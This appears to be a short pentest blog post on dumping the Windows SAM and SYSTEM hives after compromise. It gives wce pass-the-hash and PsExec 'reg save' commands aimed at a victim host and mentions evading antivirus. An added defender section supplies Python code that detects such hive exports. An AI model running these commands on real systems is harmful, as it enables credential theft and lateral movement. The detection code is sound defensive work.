This command came in very handy on a recent pentest. Essentially it allows us to dump out the SAM and SYSTEM hives on a compromised host, whilst also helping avoid A/V. It should be noted that this is a post-exploitation task and assumes you have SYSTEM access to the host, or are using a privileged hash to authenticate from a remote system.
If you wish to perform this remotely you’ll need the relevant hash and wce to run the following command:
wce.exe -s administrator:500:LMHASH:NTHASH -c cmd.exe
Then in the spawned window you can use the following:
PsExec.exe \\%VICTIM_IP% reg save hklm\system %LOCATION% & PsExec.exe \\%VICTIM_IP% reg save hklm\sam %LOCATION%
If you have local access you can obviously drop the wce and PsExec sections and run the two reg save commands directly.
If you have any issues accessing ADMIN$ etc. you can always use the reg hack as described in a previous post.
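From the defender's side, here is an added example (not part of the original post) of detection logic for exactly this activity: process-creation records where reg.exe saves the HKLM SAM, SYSTEM or SECURITY hive, raised to high severity when the parent is PsExec's service binary PSEXESVC.exe. The pipe-delimited record format and the sample events are constructed for this example, not real captured logs.

```python
import re

# Constructed sample records in a simplified Sysmon Event ID 1 (process creation)
# style: "Field=value" pairs separated by "|". Not real captured logs.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\reg.exe|ParentImage=C:\\Windows\\PSEXESVC.exe"
    "|User=NT AUTHORITY\\SYSTEM|CommandLine=reg save hklm\\system C:\\Windows\\Temp\\sys.hiv",
    "Image=C:\\Windows\\System32\\reg.exe|ParentImage=C:\\Windows\\PSEXESVC.exe"
    "|User=NT AUTHORITY\\SYSTEM|CommandLine=reg  save HKLM\\SAM \\\\share\\loot\\sam.hiv",
    "Image=C:\\Windows\\System32\\reg.exe|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|User=CORP\\admin|CommandLine=reg query hklm\\software\\Microsoft",
    "Image=C:\\Windows\\System32\\reg.exe|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|User=CORP\\admin|CommandLine=reg save hkcu\\software C:\\backup\\hkcu.hiv",
]

# "save" followed by an HKLM credential hive, case-insensitive, tolerating
# extra whitespace and an optional opening quote around the key path.
HIVE_RE = re.compile(
    r"\bsave\s+\"?(hklm|hkey_local_machine)\\(sam|system|security)\b", re.I
)


def parse_event(line):
    """Split one constructed record into a dict of field name -> value."""
    return dict(field.split("=", 1) for field in line.split("|"))


def classify(line):
    """Return a finding dict for a credential-hive export, else None."""
    ev = parse_event(line)
    image = ev.get("Image", "").lower()
    if not image.endswith("\\reg.exe"):
        return None
    match = HIVE_RE.search(ev.get("CommandLine", ""))
    if not match:
        return None
    parent = ev.get("ParentImage", "").lower()
    via_psexec = parent.endswith("\\psexesvc.exe")  # PsExec's remote service
    return {
        "hive": match.group(2).upper(),
        "via_psexec": via_psexec,
        "severity": "high" if via_psexec else "medium",
        "user": ev.get("User", ""),
    }


def scan(lines):
    """Run the classifier over a batch of records and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]
```

Running scan(SAMPLE_EVENTS) flags only the two hive exports; the reg query and the HKCU backup are not reported. The same rule applies whether the export was run locally or through PsExec, which is the point: the hive path in the command line is the stable signal.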